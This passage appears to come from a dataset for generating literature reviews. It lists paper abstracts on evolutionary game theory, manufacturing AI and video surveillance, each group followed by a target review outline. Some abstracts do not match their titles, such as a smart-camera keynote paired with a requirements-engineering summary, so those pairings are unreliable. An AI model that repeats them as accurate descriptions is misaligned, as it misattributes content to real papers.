behavior in a large segments of parameters while pool punishers can only survive in the limit of weak peer punishment when a rich variety of solutions is observed. Paradoxically, the two types of punishment may extinguish each other's impact resulting in the triumph of defectors. The technical difficulties and suggested methods are briefly discussed. --- paper_title: Does local competition increase the coexistence of species in intransitive networks? paper_content: Competitive intransitivity, a situation in which species' competitive ranks cannot be listed in a strict hierarchy, promotes species coexistence through "enemy's enemy indirect facilitation." Theory suggests that intransitivity-mediated coexistence is enhanced when competitive interactions occur at local spatial scales, although this hypothesis has not been thoroughly tested. Here, we use a lattice model to investigate the effect of local vs. global competition on intransitivity-mediated coexistence across a range of species richness values and levels of intransitivity. Our simulations show that local competition can enhance intransitivity-mediated coexistence in the short-term, yet hinder it in the long-term, when compared to global competition. This occurs because local competition slows species disaggregation, allowing weaker competitors to persist longer in the shifting spatial refuges of intransitive networks, enhancing short-term coexistence. Conversely, our simulations show that, in the long-term, local competition traps disaggregated species in unfavorable areas of the competitive arena, where they are excluded by superior competitors. As a result, in the long-term, global intransitive competition allows a greater number of species to coexist than local intransitive competition. --- paper_title: Chemical Warfare Among Invaders: A Detoxification Interaction Facilitates an Ant Invasion paper_content: As tawny crazy ants ( Nylanderia fulva ) invade the southern USA, they often displace imported fire ants ( Solenopsis invicta ). Following exposure to S. invicta venom, N. fulva applies abdominal exocrine gland secretions to its cuticle. Bioassays reveal that these secretions detoxify S. invicta venom. Further, formic acid, from N. fulva venom, is the detoxifying agent. N. fulva exhibits this detoxification behavior after conflict with a variety of ant species; however, it expresses it most intensely after interactions with S. invicta . This behavior may have evolved in their shared South American native range. The unique capacity to detoxify a major competitor’s venom likely contributes substantially to its ability to displace S. invicta populations, making this behavior a causative agent in the ecological transformation of regional arthropod assemblages. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: The role of diversity in the evolution of cooperation paper_content: Understanding the evolutionary mechanisms that promote and maintain cooperative behavior is recognized as a major theoretical problem where the intricacy increases with the complexity of the participating individuals. This is epitomized by the diverse nature of Human interactions, contexts, preferences and social structures. Here we discuss how social diversity, in several of its flavors, catalyzes cooperative behavior. From the diversity in the number of interactions an individual is involved to differences in the choice of role models and contributions, diversity is shown to significantly increase the chances of cooperation. Individual diversity leads to an overall population dynamics in which the underlying dilemma of cooperation is changed, benefiting the society as whole. In addition, we show how diversity in social contexts can arise from the individual capacity for organizing their social ties. As such, Human diversity, on a grand scale, may be instrumental in shaping us as the most sophisticated cooperative entities on this planet. --- paper_title: Social diversity promotes the emergence of cooperation in public goods games paper_content: Although humans often cooperate with each other, the temptation to forego the public good mostly wins over collective cooperative action, leading to the so-called 'tragedy of the commons'. Many existing models treat individuals as equivalent, ignoring diversity and population structure. Santos et al. show theoretically that social diversity, introduced via heterogeneous graphs, promotes the emergence of cooperation in public goods games. Humans often cooperate with each other, but the temptation to forgo the public good mostly wins over collective cooperative action. Many existing models treat individuals as equivalent, ignoring diversity and population structure; however, here it's shown theoretically that social diversity, introduced via heterogeneous graphs, promotes the emergence of cooperation in public goods games. Humans often cooperate in public goods games1,2,3 and situations ranging from family issues to global warming4,5. However, evolutionary game theory predicts4,6 that the temptation to forgo the public good mostly wins over collective cooperative action, and this is often also seen in economic experiments7. Here we show how social diversity provides an escape from this apparent paradox. Up to now, individuals have been treated as equivalent in all respects4,8, in sharp contrast with real-life situations, where diversity is ubiquitous. We introduce social diversity by means of heterogeneous graphs and show that cooperation is promoted by the diversity associated with the number and size of the public goods game in which each individual participates and with the individual contribution to each such game. When social ties follow a scale-free distribution9, cooperation is enhanced whenever all individuals are expected to contribute a fixed amount irrespective of the plethora of public goods games in which they engage. Our results may help to explain the emergence of cooperation in the absence of mechanisms based on individual reputation and punishment10,11,12. Combining social diversity with reputation and punishment will provide instrumental clues on the self-organization of social communities and their economical implications. --- paper_title: Network structure, predator–prey modules, and stability in large food webs paper_content: Large, complex networks of ecological interactions with random structure tend invariably to instability. This mathematical relationship between complexity and local stability ignited a debate that has populated ecological literature for more than three decades. Here we show that, when species interact as predators and prey, systems as complex as the ones observed in nature can still be stable. Moreover, stability is highly robust to perturbations of interaction strength, and is largely a property of structure driven by predator–prey loops with the stability of these small modules cascading into that of the whole network. These results apply to empirical food webs and models that mimic the structure of natural systems as well. These findings are also robust to the inclusion of other types of ecological links, such as mutualism and interference competition, as long as consumer–resource interactions predominate. These considerations underscore the influence of food web structure on ecological dynamics and challenge the current view of interaction strength and long cycles as main drivers of stability in natural communities. --- paper_title: Competitive intransitivity promotes species coexistence. paper_content: Using a spatially explicit cellular automaton model with local competition, we investigate the potential for varied levels of competitive intransitivity (i.e., nonhierarchical competition) to promote species coexistence. As predicted, on average, increased levels of intransitivity result in more sustained coexistence within simulated communities, although the outcome of competition also becomes increasingly unpredictable. Interestingly, even a moderate degree of intransitivity within a community can promote coexistence, in terms of both the length of time until the first competitive exclusion and the number of species remaining in the community after 500 simulated generations. These results suggest that modest levels of intransitivity in nature, such as those that are thought to be characteristic of plant communities, can contribute to coexistence and, therefore, community-scale biodiversity. We explore a potential connection between competitive intransitivity and neutral theory, whereby competitive intransitivity may represent an important mechanism for "ecological equivalence." --- paper_title: A competitive network theory of species diversity. paper_content: Nonhierarchical competition between species has been proposed as a potential mechanism for biodiversity maintenance, but theoretical and empirical research has thus far concentrated on systems composed of relatively few species. Here we develop a theory of biodiversity based on a network representation of competition for systems with large numbers of competitors. All species pairs are connected by an arrow from the inferior to the superior. Using game theory, we show how the equilibrium density of all species can be derived from the structure of the network. We show that when species are limited by multiple factors, the coexistence of a large number of species is the most probable outcome and that habitat heterogeneity interacts with network structure to favor diversity. --- paper_title: Meet the New Boss – Same as the Old Boss paper_content: A key paradox of subalternity for the subject throwing off the colonial yoke is the degree to which the collective emergence from the nation-state is to be in the image of the colonizer; that is, as a modern state, notionally on a par with the mother/father country. With a view to understanding the meaning of such symbolic investments, this paper surveys the lyrics of national anthems from a wide range of postcolonial countries. ::: ::: Despite the avowals one regularly finds in the lyrics of postcolonial anthems, and despite the expression of sometimes rote resistance to a putative colonial oppressor, those singing songs which imitate European anthems, and the feeling such anthems inspire, invest identity in the mimetic, rather than the unique. On the basis of a range of observations of anthems and their circumstances, this paper dares to ask finally whether the singing of anthems makes for better worlds. --- paper_title: A General Model for Food Web Structure paper_content: A central problem in ecology is determining the processes that shape the complex networks known as food webs formed by species and their feeding relationships. The topology of these networks is a major determinant of ecosystems' dynamics and is ultimately responsible for their responses to human impacts. Several simple models have been proposed for the intricate food webs observed in nature. We show that the three main models proposed so far fail to fully replicate the empirical data, and we develop a likelihood-based approach for the direct comparison of alternative models based on the full structure of the network. Results drive a new model that is able to generate all the empirical data sets and to do so with the highest likelihood. --- paper_title: Dynamics of N-person snowdrift games in structured populations. paper_content: In many real-life situations, the completion of a task by a group toward achieving a common goal requires the cooperation of at least some of its members, who share the required workload. Such cases are conveniently modeled by the N-person snowdrift game, an example of a Public Goods Game. Here we study how an underlying network of contacts affects the evolutionary dynamics of collective action modeled in terms of such a Public Goods Game. We analyze the impact of different types of networks in the global, population-wide dynamics of cooperators and defectors. We show that homogeneous social structures enhance the chances of coordinating toward stable levels of cooperation, while heterogeneous network structures create multiple internal equilibria, departing significantly from the reference scenario of a well-mixed, structureless population. --- paper_title: Evolutionary dynamics of collective action in N-person stag hunt dilemmas paper_content: In the animal world, collective action to shelter, protect and nourish requires the cooperation of group members. Among humans, many situations require the cooperation of more than two individuals simultaneously. Most of the relevant literature has focused on an extreme case, the N-person Prisoner's Dilemma. Here we introduce a model in which a threshold less than the total group is required to produce benefits, with increasing participation leading to increasing productivity. This model constitutes a generalization of the two-person stag hunt game to an N-person game. Both finite and infinite population models are studied. In infinite populations this leads to a rich dynamics that admits multiple equilibria. Scenarios of defector dominance, pure coordination or coexistence may arise simultaneously. On the other hand, whenever one takes into account that populations are finite and when their size is of the same order of magnitude as the group size, the evolutionary dynamics is profoundly affected: it may ultimately invert the direction of natural selection, compared with the infinite population limit. --- paper_title: WHY DO POPULATIONS CYCLE? A SYNTHESIS OF STATISTICAL AND MECHANISTIC MODELING APPROACHES paper_content: Population cycles have long fascinated ecologists. Even in the most-studied populations, however, scientists continue to dispute the relative importance of various potential causes of the cycles. Over the past three decades, theoretical ecologists have cataloged a large number of mechanisms that are capable of generating cycles in population models. At the same time, statisticians have developed new techniques both for characterizing time series and for fitting population models to time-series data. Both disciplines are now sufficiently advanced that great gains in understanding can be made by synthesizing these complementary, and heretofore mostly independent, quantitative approaches. In this paper we demonstrate how to apply this synthesis to the problem of population cycles, using both long-term population time series and the often-rich observational and experimental data on the ecology of the species in question. We quantify hypotheses by writing mathematical models that embody the interactions and forces that might cause cycles. Some hypotheses can be rejected out of hand, as being unable to generate even qualitatively appropriate dynamics. We finish quantifying the remaining hypotheses by estimating parameters, both from independent experiments and from fitting the models to the time-series data using modern statistical techniques. Finally, we compare simulated time series generated by the models to the observed time series, using a variety of statistical descriptors, which we refer to collectively as “probes.” The model most similar to the data, as measured by these probes, is considered to be the most likely candidate to represent the mechanism underlying the population cycles. We illustrate this approach by analyzing one of Nicholson’s blowfly populations, in which we know the “true” governing mechanism. Our analysis, which uses only a subset of the information available about the population, uncovers the correct answer, suggesting that this synthetic approach might be successfully applied to field populations as well. --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. --- paper_title: From pairwise to group interactions in games of cyclic dominance paper_content: We study the rock-paper-scissors game in structured populations, where the invasion rates determine individual payoffs that govern the process of strategy change. The traditional version of the game is recovered if the payoffs for each potential invasion stem from a single pairwise interaction. However, the transformation of invasion rates to payoffs also allows the usage of larger interaction ranges. In addition to the traditional pairwise interaction, we therefore consider simultaneous interactions with all nearest neighbors, as well as with all nearest and next-nearest neighbors, thus effectively going from single pair to group interactions in games of cyclic dominance. We show that differences in the interaction range affect not only the stationary fractions of strategies, but also their relations of dominance. The transition from pairwise to group interactions can thus decelerate and even revert the direction of the invasion between the competing strategies. Like in evolutionary social dilemmas, in games of cyclic dominance too the indirect multipoint interactions that are due to group interactions hence play a pivotal role. Our results indicate that, in addition to the invasion rates, the interaction range is at least as important for the maintenance of biodiversity among cyclically competing strategies. --- paper_title: Social diversity and promotion of cooperation in the spatial prisoner's dilemma game paper_content: The diversity in wealth and social status is present not only among humans, but throughout the animal world. We account for this observation by generating random variables that determine the social diversity of players engaging in the prisoner's dilemma game. Here the term social diversity is used to address extrinsic factors that determine the mapping of game payoffs to individual fitness. These factors may increase or decrease the fitness of a player depending on its location on the spatial grid. We consider different distributions of extrinsic factors that determine the social diversity of players, and find that the power-law distribution enables the best promotion of cooperation. The facilitation of the cooperative strategy relies mostly on the inhomogeneous social state of players, resulting in the formation of cooperative clusters which are ruled by socially high-ranking players that are able to prevail against the defectors even when there is a large temptation to defect. To confirm this, we also study the impact of spatially correlated social diversity and find that cooperation deteriorates as the spatial correlation length increases. Our results suggest that the distribution of wealth and social status might have played a crucial role by the evolution of cooperation amongst egoistic individuals. ---
Title: Cyclic dominance in evolutionary games: A review Section 1: INTRODUCTION Description 1: Introduce the concept of cyclic dominance in evolutionary games and its significance in explaining biodiversity and evolutionary dynamics. Highlight examples from nature and describe the role of spatial structure and mobility. Section 2: ROCK-PAPER-SCISSORS GAME IN STRUCTURED POPULATIONS Description 2: Discuss the dynamics of the rock-paper-scissors (RPS) game in structured populations, focusing on interaction networks and the effect of mobility on the outcome of these games. Section 3: Interaction networks Description 3: Explore how different types of interaction networks, such as lattices and small-world networks, impact the dynamics and outcome of cyclic dominance in evolutionary games. Section 4: Mobility Description 4: Review the impact of mobility on biodiversity and pattern formation in RPS games, including the emergence of spiral and target waves. Section 5: Metapopulation and nonlinear mobility Description 5: Introduce the metapopulation modeling approach and discuss nonlinear mobility's effects on the evolutionary dynamics of cyclic dominance games. Section 6: Complex Ginzburg-Landau equation Description 6: Explain the derivation and application of the Complex Ginzburg-Landau equation (CGLE) to predict spatio-temporal patterns in RPS games. Section 7: EVOLUTIONARY GAMES WITH SPONTANEOUSLY EMERGING CYCLIC DOMINANCE Description 7: Discuss instances where cyclic dominance emerges spontaneously in evolutionary games, covering topics such as time-dependent learning and voluntary participation. Section 8: Time-dependent learning Description 8: Analyze the role of time-dependent properties, like learning ability, in generating cyclic dominance in two-strategy and more complex games. Section 9: Voluntary participation Description 9: Review the effects of voluntary participation in public goods games, including the emergence and experimental validation of the "Red Queen" effect. Section 10: When three competing strategies are more than three Description 10: Examine cases where an alliance of strategies acts as an additional "strategy" in cyclic dominance, focusing on structured populations. Section 11: CYCLIC DOMINANCE BETWEEN MORE THAN THREE STRATEGIES Description 11: Investigate the complexity of evolutionary dynamics when the number of competing strategies exceeds three and discuss the emergence of defensive alliances and global oscillations. Section 12: Alliances Description 12: Detail the formation and impact of alliances within cyclic dominance games, highlighting examples and the conditions under which they form. Section 13: CONCLUSIONS AND OUTLOOK Description 13: Summarize the main findings and discuss unexplored problems related to cyclic dominance in evolutionary games, offering insights and directions for future research.
Applications of artificial intelligence in intelligent manufacturing: a review
18
--- paper_title: Visual Computing as a Key Enabling Technology for Industrie 4.0 and Industrial Internet paper_content: A worldwide movement in advanced manufacturing countries is seeking to reinvigorate (and revolutionize) the industrial and manufacturing core competencies with the use of the latest advances in information and communications technology. Visual computing plays an important role as the "glue factor" in complete solutions. This article positions visual computing in its intrinsic crucial role for Industrie 4.0 and provides a general, broad overview and points out specific directions and scenarios for future research. --- paper_title: A Cyber-Physical Systems architecture for Industry 4.0-based manufacturing systems paper_content: Abstract Recent advances in manufacturing industry has paved way for a systematical deployment of Cyber-Physical Systems (CPS), within which information from all related perspectives is closely monitored and synchronized between the physical factory floor and the cyber computational space. Moreover, by utilizing advanced information analytics, networked machines will be able to perform more efficiently, collaboratively and resiliently. Such trend is transforming manufacturing industry to the next generation, namely Industry 4.0. At this early development phase, there is an urgent need for a clear definition of CPS. In this paper, a unified 5-level architecture is proposed as a guideline for implementation of CPS. --- paper_title: A dynamic model and an algorithm for short-term supply chain scheduling in the smart factory industry 4.0 paper_content: Smart factories Industry 4.0 on the basis of collaborative cyber-physical systems represents a future form of industrial networks. Supply chains in such networks have dynamic structures which evolve over time. In these settings, short-term supply chain scheduling in smart factories Industry 4.0 is challenged by temporal machine structures, different processing speed at parallel machines and dynamic job arrivals. In this study, for the first time, a dynamic model and algorithm for short-term supply chain scheduling in smart factories Industry 4.0 is presented. The peculiarity of the considered problem is the simultaneous consideration of both machine structure selection and job assignments. The scheduling approach is based on a dynamic non-stationary interpretation of the execution of the jobs and a temporal decomposition of the scheduling problem. The algorithmic realisation is based on a modified form of the continuous maximum principle blended with mathematical optimisation. A detailed theoretical analysis of the temporal decomposition and computational complexity is performed. The optimality conditions as well as the structural properties of the model and the algorithm are investigated. Advantages and limitations of the proposed approach are discussed. --- paper_title: Cloud Manufacturing Platform: Operating Paradigm, Functional Requirements, and Architecture Design paper_content: Cloud manufacturing is emerging as a new promising business paradigm as well as an integrated technical approach, contributing to the shaping of a highly-collaborative, knowledge-intensive, service-oriented and eco-efficient manufacturing industry. The following research issues concerning cloud manufacturing platform, what users can achieve with the platform, what the platform can do, and how to design it, play crucial roles in this new area. This paper proposes a cloud manufacturing paradigm that depicts a typical scenario which can provide an explanation for the concept of cloud manufacturing and makes the mysterious “cloud” transparent. Then the functional requirements of cloud manufacturing platform are investigated to specify design objectives. Based on these, the paper presents the design of MfgCloud, a cloud manufacturing platform prototype. In discussion of the main components of MfgCloud, the specific concepts different from those corresponding terms in IT area are also defined and given their implementation mechanisms. Consequently, this paper proposes a new point of view for the concept of cloud manufacturing, and accordingly presents a reference design of cloud manufacturing platform.Copyright © 2013 by ASME --- paper_title: Cloud manufacturing:a new service-oriented networked manufacturing model paper_content: To solve more complex manufacturing problems and perform larger-scale collaborative manufacturing,the impediments to practical application and development of Networked Manufacturing(NM) were analyzed.Technologies,such as cloud computing,cloud security,high performance computing,Internet of things which were used to solve the mentioned impediments,were briefly described.Based on it,a new service-oriented networked manufacturing model called Cloud Manufacturing(CMfg)was put forward.Then,the concept of CMfg was defined.And differences among CMfg,application service provider and manufacturing grid were discussed.CMfg architecture was also proposed,key technologies for implementing CMfg were studied and preliminary research results were introduced.Finally,an application prototype of CMfg,i.e.,COSIM-SCP,was presented. ---
Title: Applications of artificial intelligence in intelligent manufacturing: a review Section 1: Introduction Description 1: This section introduces the current technological and industrial revolution focusing on the integration of AI with manufacturing processes to enhance the national economy, security, and well-being. Section 2: New development of artificial intelligence Description 2: This section covers the evolution of AI into a new phase (AI 2.0) driven by big data, the Internet, and other emerging technologies, highlighting market demand and technological advancements in various smart systems. Section 3: Artificial intelligence facilitates the development of intelligent manufacturing Description 3: This section discusses how AI applications foster new manufacturing models, methods, and ecosystems by improving efficiency, quality, and market competitiveness. Section 4: New models, means, and forms of intelligent manufacturing Description 4: This section details innovative manufacturing models, integration means, and ecosystem forms, emphasizing the role of AI in transforming production and services. Section 5: Intelligent manufacturing system architecture Description 5: This section outlines the architectural layers of intelligent manufacturing systems, including resources/capacities, networks, service platforms, intelligent cloud services, and security management. Section 6: Resources/capacities layer Description 6: This section describes the various hard and soft resources and manufacturing capacities required in the intelligent manufacturing system. Section 7: Ubiquitous network layer Description 7: This section focuses on the network layers necessary for communication, sensing, and business operations within the intelligent manufacturing system. Section 8: Service platform layer Description 8: This section elaborates on the components of the service platform layer, including virtual resources, intelligent support functions, and user interfaces to support intelligent manufacturing. Section 9: Intelligent cloud service application layer Description 9: This section highlights the application modes of intelligent cloud services, emphasizing autonomous processes and human-machine interaction. Section 10: Security management and standard specifications Description 10: This section discusses the importance of security management and standardization in protecting and regulating intelligent manufacturing systems. Section 11: Intelligent manufacturing technology system Description 11: This section outlines the technological components and systems essential for implementing intelligent manufacturing, ranging from general technology to specific life cycle and supporting technologies. Section 12: Evaluation of the application of AI in intelligent manufacturing Description 12: This section provides criteria for evaluating AI applications in intelligent manufacturing, focusing on technology assessment, industry development, and application effects. Section 13: Overseas development Description 13: This section reviews the strategic plans and technological advancements in intelligent manufacturing by developed countries like the US and Germany, highlighting their milestones and demonstrative applications. Section 14: Domestic development Description 14: This section discusses China's strategic initiatives and progress in intelligent manufacturing, emphasizing the need for transforming its manufacturing industry using AI. Section 15: Research direction of AI 2.0 in intelligent manufacturing industry Description 15: This section proposes future research directions for integrating AI 2.0 in intelligent manufacturing, focusing on application technologies, industry development, and typical paradigms. Section 16: Application technologies of intelligent manufacturing Description 16: This section outlines specific intelligent manufacturing application technologies, focusing on system frameworks, platform technologies, and key life cycle activities. Section 17: Development of the intelligent manufacturing industry Description 17: This section discusses research directions in developing intelligent products, industrial tools, and multi-layer intelligent manufacturing systems. Section 18: Typical paradigms of intelligent manufacturing Description 18: This section highlights various demonstration paradigms in intelligent manufacturing, including model-driven collaboration, cloud services, intelligent workshops, and autonomous manufacturing units.
A Survey Of Activity Recognition And Understanding The Behavior In Video Survelliance
7
--- paper_title: Statistical Background Modeling: An Edge Segment Based Moving Object Detection Approach paper_content: We propose an edge segment based statistical background modeling algorithm and a moving edge detection framework for the detection of moving objects. We analyze the performance of the proposed segment based statistical background model with traditional pixel based, edge pixel based and edge segment based approaches. Existing edge based moving object detection algorithms fetches difficulty due to the change in background motion, object shape, illumination variation and noise. The proposed algorithm makes efficient use of statistical background model using the edge-segment structure. Experiments with natural image sequences show that our method can detect moving objects efficiently under the above mentioned environments. --- paper_title: Adaptive mean-shift for automated multi object tracking paper_content: Mean-shift tracking plays an important role in computer vision applications because of its robustness, ease of implementation and computational efficiency. In this study, a fully automatic multiple-object tracker based on mean-shift algorithm is presented. Foreground is extracted using a mixture of Gaussian followed by shadow and noise removal to initialise the object trackers and also used as a kernel mask to make the system more efficient by decreasing the search area and the number of iterations to converge for the new location of the object. By using foreground detection, new objects entering to the field of view and objects that are leaving the scene could be detected. Trackers are automatically refreshed to solve the potential problems that may occur because of the changes in objects' size, shape, to handle occlusion-split between the tracked objects and to detect newly emerging objects as well as objects that leave the scene. Using a shadow removal method increases the tracking accuracy. As a result, a method that remedies problems of mean-shift tracking and presents an easy to implement, robust and efficient tracking method that can be used for automated static camera video surveillance applications is proposed. Additionally, it is shown that the proposed method is superior to the standard mean-shift. --- paper_title: Bayesian visual surveillance: A model for detecting and tracking a variable number of moving objects paper_content: An automatic detection and tracking framework for visual surveillance is proposed, which is able to handle a variable number of moving objects. Video object detectors generate an unordered set of noisy, false, missing, split, and merged measurements that make extremely complex the tracking task. Especially challenging are split detections (one object is split into several measurements) and merged detections (several objects are merged into one detection). Few approaches address this problem directly, and the existing ones use heuristics methods, or assume a known number of objects, or are not suitable for on-line applications. In this paper, a Bayesian Visual Surveillance Model is proposed that is able to manage undesirable measurements. Particularly, split and merged measurements are explicitly modeled by stochastic processes. Inference is accurately performed through a particle filtering approach that combines ancestral and MCMC sampling. Experimental results have shown a high performance of the proposed approach in real situations. --- paper_title: Multi-Feature Fusion Based Object Detecting and Tracking paper_content: A new approach is proposed to detect and track the moving object. The affine motion model and the non-parameter distribution model are utilized to represent the object firstly. Then the motion region of the object is detected by background difference while Kalman filter estimating its affine motion in next frame. Center association and mean shift are adopted to obtain the observation values. Finally, the distance variance and scale variance between the estimated and detected regions are used to fuse the observation values to acquire the measurement value. To correct fusion errors, the observable edges are employed. Experimental results show that the new method can successfully track the object under such case as merging, splitting, scale variation and scene noise. --- paper_title: Keynote talk 4: Automated understanding of video object events in a distributed smart camera network paper_content: Summary form only given. You may think that your requirements engineering process is fairly limited and currently not too complex to manage. Or you may be right in the middle of a storm of requirements where it is impossible to manage even the most important ones comprehensively. If you are in the former situation, it may be dangerous to relax as many successful software-intensive products have a tendency to grow very rapidly in size and complexity, and sooner than you might think you may be hit by a massive flood of feature requests and too few resources to prevent the flood from drowning your development organization, which in turn put your future innovation capability and competitiveness at risk. --- paper_title: Real-time Object Classification in Video Surveillance Based on Appearance Learning paper_content: Classifying moving objects to semantically meaningful categories is important for automatic visual surveillance. However, this is a challenging problem due to the factors related to the limited object size, large intra-class variations of objects in a same class owing to different viewing angles and lighting, and real-time performance requirement in real-world applications. This paper describes an appearance-based method to achieve real-time and robust objects classification in diverse camera viewing angles. A new descriptor, i.e., the multi-block local binary pattern (MB-LBP), is proposed to capture the large-scale structures in object appearances. Based on MB-LBP features, an adaBoost algorithm is introduced to select a subset of discriminative features as well as construct the strong two-class classifier. To deal with the non-metric feature value of MB-LBP features, a multi-branch regression tree is developed as the weak classifiers of the boosting. Finally, the error correcting output code (ECOC) is introduced to achieve robust multi-class classification performance. Experimental results show that our approach can achieve real-time and robust object classification in diverse scenes. --- paper_title: ViBe: A Universal Background Subtraction Algorithm for Video Sequences paper_content: This paper presents a technique for motion detection that incorporates several innovative mechanisms. For example, our proposed technique stores, for each pixel, a set of values taken in the past at the same location or in the neighborhood. It then compares this set to the current pixel value in order to determine whether that pixel belongs to the background, and adapts the model by choosing randomly which values to substitute from the background model. This approach differs from those based upon the classical belief that the oldest values should be replaced first. Finally, when the pixel is found to be part of the background, its value is propagated into the background model of a neighboring pixel. We describe our method in full details (including pseudo-code and the parameter values used) and compare it to other background subtraction techniques. Efficiency figures show that our method outperforms recent and proven state-of-the-art methods in terms of both computation speed and detection rate. We also analyze the performance of a downscaled version of our algorithm to the absolute minimum of one comparison and one byte of memory per pixel. It appears that even such a simplified version of our algorithm performs better than mainstream techniques. --- paper_title: Automatic Reasoning about Causal Events in Surveillance Video paper_content: We present a new method for explaining causal interactions among people in video. The input to the overall system is video in which people are low/medium resolution. We extract and maintain a set of qualitative descriptions of single-person activity using the low-level vision techniques of spatiotemporal action recognition and gaze-direction approximation. This models the input to the "sensors" of the person agent in the scene and is a general sensing strategy for a person agent in a variety of application domains. The information subsequently available to the reasoning process is deliberately limited to model what an agent would actually be able to sense. The reasoning is therefore not a classical "all-knowing" strategy but uses these "sensed" facts obtained from the agents, combined with generic domain knowledge, to generate causal explanations of interactions. We present results from urban surveillance video. --- paper_title: Shape Based Object Classification for Automated Video Surveillance with Feature Selection paper_content: Object classification based on shape features for video surveillance has been a research problem for number of years. The object classification accuracy depends on the type of classifier and the extracted object features used for classification. Excellent classification accuracy can be obtained with an appropriate combination of the extracted features with a particular classifier. In this paper, we propose to use an online feature selection method which gives a good subset of features while the machine learns the classification task and use these selected features for object classification. This paper also explores the impact of different kinds of shape features on the object classification accuracy and the performance of different classifiers in a typical automated video surveillance application. --- paper_title: Online EM Algorithm for Background Subtraction paper_content: Abstract Gaussian mixture model is a popular model in background subtraction and efficient equations have been derived to update GMM parameters previously. In order to compute parameters more accurately while maintain constant computing time per frame, we apply online EM algorithm to update the parameters of Gaussian mixture models. To avoid computing the inverse of covariance matrix, we use isotropic matrix and the corresponding incremental EM equations are derived. Experiments demonstrate that online EM algorithm can give more accurate segment result than previous update equations. --- paper_title: Proposed framework of Intelligent Video Automatic Target Recognition System (IVATRs) paper_content: In this paper we have introduce a novel hybrid method framework for feature extraction using genetic algorithms in Automatic Target Recognition. In this paper we have given a complete framework and approach for making the system of Automatic Target Recognition System we suggest the name of IVATRs (Intelligent Video Automatic Target Recognition System). This framework will be helpful for making a bridge between the theoretical models of AI techniques and their implementations with hardware. During this study our objective is to design a hybrid mechanism for the currently existing ATRs techniques. This study will also lead us to the result of predicting the behavior of targeted objects and future machines. --- paper_title: Multiple Camera Tracking of Interacting and Occluded Human Motion paper_content: We propose a distributed, real-time computing platform for tracking multiple interacting persons in motion. To combat the negative effects of occlusion and articulated motion we use a multiview implementation, where each view is first independently processed on a dedicated processor. This monocular processing uses a predictor-corrector filter to weigh reprojections of three-dimensional (3-D) position estimates, obtained by the central processor, against observations of measurable image motion. The corrected state vectors from each view provide input observations to a Bayesian belief network, in the central processor, with a dynamic, multidimensional topology that varies as a function of scene content and feature confidence. The Bayesian net fuses independent observations from multiple cameras by iteratively resolving independency relationships and confidence levels within the graph, thereby producing the most likely vector of 3-D state estimates given the available data. To maintain temporal continuity, we follow the network with a layer of Kalman filtering that updates the 3-D state estimates. We demonstrate the efficacy of the proposed system using a multiview sequence of several people in motion. Our experiments suggest that, when compared with data fusion based on averaging, the proposed technique yields a noticeable improvement in tracking accuracy. --- paper_title: Image change detection algorithms: a systematic survey paper_content: Detecting regions of change in multiple images of the same scene taken at different times is of widespread interest due to a large number of applications in diverse disciplines, including remote sensing, surveillance, medical diagnosis and treatment, civil infrastructure, and underwater sensing. This paper presents a systematic survey of the common processing steps and core decision rules in modern change detection algorithms, including significance and hypothesis testing, predictive models, the shading model, and background modeling. We also discuss important preprocessing methods, approaches to enforcing the consistency of the change mask, and principles for evaluating and comparing the performance of change detection algorithms. It is hoped that our classification of algorithms into a relatively small number of categories will provide useful guidance to the algorithm designer. --- paper_title: Dynamic Background Subtraction Using Spatial-Color Binary Patterns paper_content: In this paper, an efficient approach for background modeling and subtraction is proposed. It's based on a novel spatial-color feature extraction operator named spatial-color binary patterns(SCBP). As the name implies, features extracted by this operator include spatial texture and color information. In addition, a refine module is designed to refine the contour of moving objects. Using the proposed method, we improve the accuracy of subtracting the background and detecting moving objects in dynamic scenes. A data-driven model is used in our method. For each pixel, first, a histogram of SCBP is extracted from the circular egion, and then a model consist of several histograms is built. For a new observed frame, each pixel is labeled either background or foreground according to the matching degree between its SCBP histogram and its model, then the label is refined and finally the model of this pixel is updated. The proposed pproach is tested on challenging video sequences, which shows that the proposed method performs much better than several texture-based methods. --- paper_title: Statistical Background Modeling: An Edge Segment Based Moving Object Detection Approach paper_content: We propose an edge segment based statistical background modeling algorithm and a moving edge detection framework for the detection of moving objects. We analyze the performance of the proposed segment based statistical background model with traditional pixel based, edge pixel based and edge segment based approaches. Existing edge based moving object detection algorithms fetches difficulty due to the change in background motion, object shape, illumination variation and noise. The proposed algorithm makes efficient use of statistical background model using the edge-segment structure. Experiments with natural image sequences show that our method can detect moving objects efficiently under the above mentioned environments. --- paper_title: Research on GMM Background Modeling and its Covariance Estimation paper_content: This paper analyzes the background modeling mechanism using Gaussian mixture model and the stability /plasticity dilemma in parameters estimation of GMM background model. To solve the slow convergence problem of Gaussian mean and covariance update formula given by Stauffer, a new updating strategy is proposed, which weighs the model adaptability and motion segmentation accuracy. Experiments show that the proposed algorithm improves the accuracy of modal learning and speed of covariance convergence. --- paper_title: Review and evaluation of commonly-implemented background 